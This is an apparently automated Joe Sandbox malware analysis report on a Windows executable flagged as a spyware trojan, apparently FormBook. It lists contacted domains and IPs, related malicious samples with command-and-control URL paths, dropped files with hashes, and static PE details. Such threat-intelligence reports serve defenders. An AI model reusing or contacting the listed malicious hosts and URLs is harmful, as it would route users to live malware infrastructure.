                                                                            		r0lqcud7.nbnnn.xyzUnited States
                                                                            		40065CNSERVERSUSfalse
                                                                            104.21.95.160
                                                                            		www.vayui.topUnited States
                                                                            		13335CLOUDFLARENETUSfalse
                                                                            18.141.10.107
                                                                            		ssbzmoy.bizUnited States
                                                                            		16509AMAZON-02USfalse
                                                                            85.159.66.93
                                                                            		natroredirect.natrocdn.comTurkey
                                                                            		34619CIZGITRfalse

                                                                            General Information

                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                            Analysis ID:1588634
                                                                            Start date and time:2025-01-11 03:28:01 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 11m 59s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:11
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Sample name:1SxKeB4u0c.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.spre.troj.spyw.evad.winEXE@9/7@17/10
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 78%
                                                                            • Number of executed functions: 59
                                                                            • Number of non-executed functions: 251
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            21:29:00API Interceptor1x Sleep call for process: 1SxKeB4u0c.exe modified
                                                                            21:29:59API Interceptor10776276x Sleep call for process: bitsadmin.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            149.88.81.190suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/hkgx/
                                                                            uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/rq1s/
                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/rq1s/
                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/rq1s/
                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs
                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/hkgx/
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/rq1s/
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/rq1s/
                                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/hkgx/
                                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                            • www.xcvbj.asia/rq1s/
                                                                            161.97.142.144gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                            • www.nb-shenshi.buzz/mz7t/
                                                                            SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.030002059.xyz/er88/
                                                                            RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.030002350.xyz/1a7n/
                                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                            • www.070001813.xyz/gn0y/
                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                            • www.070002018.xyz/6m2n/
                                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                            • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.070002018.xyz/6m2n/
                                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                            • www.030002613.xyz/xd9h/
                                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • www.030002449.xyz/cfqm/
                                                                            PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                            • www.070001955.xyz/7zj0/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.amayavp.xyzSRT68.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 185.27.134.144
                                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                            • 185.27.134.144
                                                                            www.vayui.topRFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.95.160
                                                                            RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                            • 172.67.145.234
                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.145.234
                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.145.234
                                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.95.160
                                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.145.234
                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 172.67.145.234
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.95.160
                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.145.234
                                                                            ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 172.67.145.234
                                                                            ssbzmoy.bizBzK8rQh2O3.exeGet hashmaliciousFormBookBrowse
                                                                            • 18.141.10.107
                                                                            uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                            • 18.141.10.107
                                                                            LiuUGJK9vH.exeGet hashmaliciousFormBookBrowse
                                                                            • 18.141.10.107
                                                                            UaOJAOMxcU.exeGet hashmaliciousFormBookBrowse
                                                                            • 18.141.10.107
                                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 18.141.10.107
                                                                            I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                                            • 18.141.10.107
                                                                            OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                                            • 18.141.10.107
                                                                            RJKUWSGxej.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                                                            • 18.141.10.107
                                                                            PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 18.141.10.107
                                                                            REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 18.141.10.107

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSAJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                            • 188.114.96.3
                                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                            • 188.114.97.3
                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                            • 104.21.80.1
                                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                            • 104.21.16.1
                                                                            AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                            • 172.67.186.192
                                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                            • 104.21.96.1
                                                                            rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 104.21.80.1
                                                                            YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.112.1
                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 104.21.16.1
                                                                            SAIC-ASUSsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                            • 149.88.81.190
                                                                            uG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                            • 149.88.81.190
                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                            • 149.88.225.249
                                                                            momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 149.65.180.173
                                                                            xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                            • 149.88.70.60
                                                                            xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 149.112.181.228
                                                                            nklsh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 149.88.70.11
                                                                            loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                            • 149.65.132.204
                                                                            m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                            • 149.64.118.107
                                                                            nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                            • 149.118.255.217
                                                                            CONTABODEuG3I84bQEr.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                            • 173.249.62.84
                                                                            https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                                            • 173.249.62.84
                                                                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                                            • 144.91.79.54
                                                                            DF2.exeGet hashmaliciousUnknownBrowse
                                                                            • 173.249.2.110
                                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                                            • 173.249.11.35

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1658880
                                                                            Entropy (8bit):4.312987868526287
                                                                            Encrypted:false
                                                                            SSDEEP:24576:KxGBcmlTVg9N9JMlDlfjRiVuVsWt5MJMs:CGy+BgFIDRRAubt5M
                                                                            MD5:C14356FC1BFD5700FA1D54D53D65507C
                                                                            SHA1:6C80ECAE6FBD0EE237336AB992F9855DD7A16075
                                                                            SHA-256:C0794E405B5086347FFA17D93ED4FB62E27D79767054BCAE2C459437E531ED50
                                                                            SHA-512:1D17AF89B1375AF4064C979FD4A0E15CFCDE7DFC0FCA5538797246D5349252E5DC389FA832F5F60842254D6B423FEF70EC54E603AD20DFD7AD4AB66955182A61
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................V......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\aut8CEA.tmp

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.990815558065423
                                                                            Encrypted:true
                                                                            SSDEEP:6144:LyyE0YSn2Y9KOggTibSivh0Tlpa/Ihx89xi4OP4J/zt2HB:uyE0YSn593FiKLyc89xi4OPi/mB
                                                                            MD5:33773A7150E62D4818A793C6EF824980
                                                                            SHA1:AA8395F17DF2C31407B30FEBCCF07E4556C8D3C3
                                                                            SHA-256:98906E70EE67577ADF9E6A01BED48DD87E9264A480975E25B2EF52EE3F40E5EB
                                                                            SHA-512:DF2AFE2FEC427825C22F41A3470DA704C8160CB179284DC530700A8C32E5943D1BB8D6810AAF351D974410B821E236C8F8008AD0A2D17DCA5E16857BC9121510
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...PSKBZ2ANA..PK.Z6ANAYP.KBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A.AYP^T.T6.G.x.Q..{b)'2y "$%(W,n"8>>$6zT$n3,>p",zr..a4?4.lW;KjAYPPKBZO@G.d07..:Q.s!>.J...!).C...~:Q.T..l+%.d(-)d07.BZ6ANAYP..BZz@OA.&..BZ6ANAYP.K@[=@EAY.TKBZ6ANAYP._BZ6QNAY TKBZvANQYPPIBZ0ANAYPPKDZ6ANAYPP;FZ6CNAYPPK@Zv.NAIPP[BZ6A^AY@PKBZ6A^AYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAw$536Z6A:.]PP[BZ6.JAY@PKBZ6ANAYPPKBZ.AN!YPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A

                                                                            C:\Users\user\AppData\Local\Temp\nonhazardousness

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.990815558065423
                                                                            Encrypted:true
                                                                            SSDEEP:6144:LyyE0YSn2Y9KOggTibSivh0Tlpa/Ihx89xi4OP4J/zt2HB:uyE0YSn593FiKLyc89xi4OPi/mB
                                                                            MD5:33773A7150E62D4818A793C6EF824980
                                                                            SHA1:AA8395F17DF2C31407B30FEBCCF07E4556C8D3C3
                                                                            SHA-256:98906E70EE67577ADF9E6A01BED48DD87E9264A480975E25B2EF52EE3F40E5EB
                                                                            SHA-512:DF2AFE2FEC427825C22F41A3470DA704C8160CB179284DC530700A8C32E5943D1BB8D6810AAF351D974410B821E236C8F8008AD0A2D17DCA5E16857BC9121510
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...PSKBZ2ANA..PK.Z6ANAYP.KBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A.AYP^T.T6.G.x.Q..{b)'2y "$%(W,n"8>>$6zT$n3,>p",zr..a4?4.lW;KjAYPPKBZO@G.d07..:Q.s!>.J...!).C...~:Q.T..l+%.d(-)d07.BZ6ANAYP..BZz@OA.&..BZ6ANAYP.K@[=@EAY.TKBZ6ANAYP._BZ6QNAY TKBZvANQYPPIBZ0ANAYPPKDZ6ANAYPP;FZ6CNAYPPK@Zv.NAIPP[BZ6A^AY@PKBZ6A^AYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAw$536Z6A:.]PP[BZ6.JAY@PKBZ6ANAYPPKBZ.AN!YPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A

                                                                            C:\Users\user\AppData\Local\Temp\z5f52P3-

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.1209886597424439
                                                                            Encrypted:false
                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\7d5db47b92cfd441.bin

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):12320
                                                                            Entropy (8bit):7.9840848199381735
                                                                            Encrypted:false
                                                                            SSDEEP:384:MofiAZfvMf9ANF2kvUBNdyGR5y7LZ8b3Lv:MQZf89uFopyGR5yfZ83v
                                                                            MD5:6DEFD64219DA9CB13EB36747F8B19B64
                                                                            SHA1:BC9BDA0CBE51E64290A74CFF2B8ADE49939B9372
                                                                            SHA-256:3AC031232850EA16FAAEBDAA2A6B6B3BDC8F50AEE86C4726F249C139D5484167
                                                                            SHA-512:D39B50029151F1648C62A7B1565784CCBA1741D0B62D706EA836A5BC41D1284D8FB5717D121445BCB7B16DD67A2AE495A74C185FC8D8834DB94ED81BC23A0163
                                                                            Malicious:false
                                                                            Preview:%..T...............<x.I.....K.wJ.(`...it,.J.>Yy.X{...{.H=~....}..|......7K...2..4.PMJ*Zm[.....D$..g..:.O$...pGSw....I?..,!.6..vh..G..............%f.-......g. ..%....mJ|..q.j.k!.t..O.e#.F82..].i...>.#.VW...|-.Q.^..."..>.4.....l...p.T~......t<...N....6.4...+....V..x..1.!.xO$..C....'.8..H..+XR@.+m..GAod.A...eM...O.ocd....)..Y.=H...L.bjv...6.3\...;...+........q.I.P........9..y=e....Z.TNb....G..@..R.}......D...a.58.u..t9ae)G....-.m.....\.%.t.zqy......o....v.{..7..h[..eb?.$.L.q.47^.%..*.........zL-..`...;....4...~Ch.......n.R7.[!..lS.....(..< .......<.E.6i2V.O<..p..x.ve..V.D....t...(...j..7.Rr..)..*<.V...)5.&xW..M..P!7F...p-..gU..U-B...O..{>.!..%.j.<......R|.d$.]s.r.B.`!g..>G>.!._b.$~.Q..W....\.SHs....D;*.D.~Zw........J".....l..Y.....c....)X.W..%.^.x..).dJ..H.Wyo..M......-.x.Q.u..?.c.K..........Z..kn..-..D^..u$2k^z9(.C.O........4.>'.. ..k...X.............qg4..s.C.d...[H...B.K.Y[7....8.;!Wo3.93......UU...H..-.6.mN....M..V.._..j<...J.........Bh.

                                                                            C:\Windows\System32\AppVClient.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):1348608
                                                                            Entropy (8bit):7.251557857708924
                                                                            Encrypted:false
                                                                            SSDEEP:24576:zQW4qoNUgslKNX0Ip0MgHCpoMBOueVg9N9JMlDlfjRiVuVsWt5MJMs:zQW9BKNX0IPgiKMBOuagFIDRRAubt5M
                                                                            MD5:3A9B5C284795534B55AC6281B165C4ED
                                                                            SHA1:FA98F2D4F53AC2564DB36289ED5072CC5EFCF23D
                                                                            SHA-256:2253ECDD223906BF99A2241F02C6551D7EAEE62BDF15EA314B301EE27C54B458
                                                                            SHA-512:B35DF68DEBE47688ECCB5F060815658E72C7E575E67CDEBD3A60A027D165A8DE6E935DD864AC8E688FE5FF823A32C32E69756251C46852E8C6D4A43512804995
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                            C:\Windows\System32\alg.exe

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1594368
                                                                            Entropy (8bit):4.175673465116363
                                                                            Encrypted:false
                                                                            SSDEEP:12288:hEP3RFgV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:SFMVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                            MD5:212514466AE3CEB072CE28C89C73B2D2
                                                                            SHA1:9691BB45FFA687ED75668B5E1E67EDF91DFBDD57
                                                                            SHA-256:67BDB5F06697D60D7C4AEE5A1F439B0A35C542FDF42F72B444F6FC1ED170C36D
                                                                            SHA-512:C35DE7DD51F635DDF8822AEB22D9DC2B9D5A2843681AA5C55C7F180B3CA1FB3EA9CB657F416CFE609CB53347CB6870E90D2B563915317004346C56B2DE9F8F46
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@...................................."..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.519156787078324
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:1SxKeB4u0c.exe
                                                                            File size:1'794'048 bytes
                                                                            MD5:897ff2a936f11b8f74f56e0c835a2c43
                                                                            SHA1:9d55cead9cdcd487df37b4264f4a2483f19c8184
                                                                            SHA256:00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539
                                                                            SHA512:eea47407e00dca3d8ea1c8bd1d6b375c0c1ed1a09be7e1bceecd1b61785f1c56ed6d947ffa27bad846a205bed79a329552b8aa1b24b518ab21f5b9551358afc9
                                                                            SSDEEP:49152:G20c++OCvkGs9Fa/IZ1g7yiu9SLYZgFIDRRAubt5M:ZB3vkJ9z1g7yx9ivUf
                                                                            TLSH:CA85E02273DDC360CB669173FF2AB7016E7B3C614630B95B2F940D7DA960162262D7A3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                            File Icon

                                                                            Icon Hash:aaf3e3e3938382a0

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x427dcd
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x674F9130 [Tue Dec 3 23:16:00 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007FA8D172BDAAh
                                                                            jmp 00007FA8D171EB74h
                                                                            int3
                                                                            int3
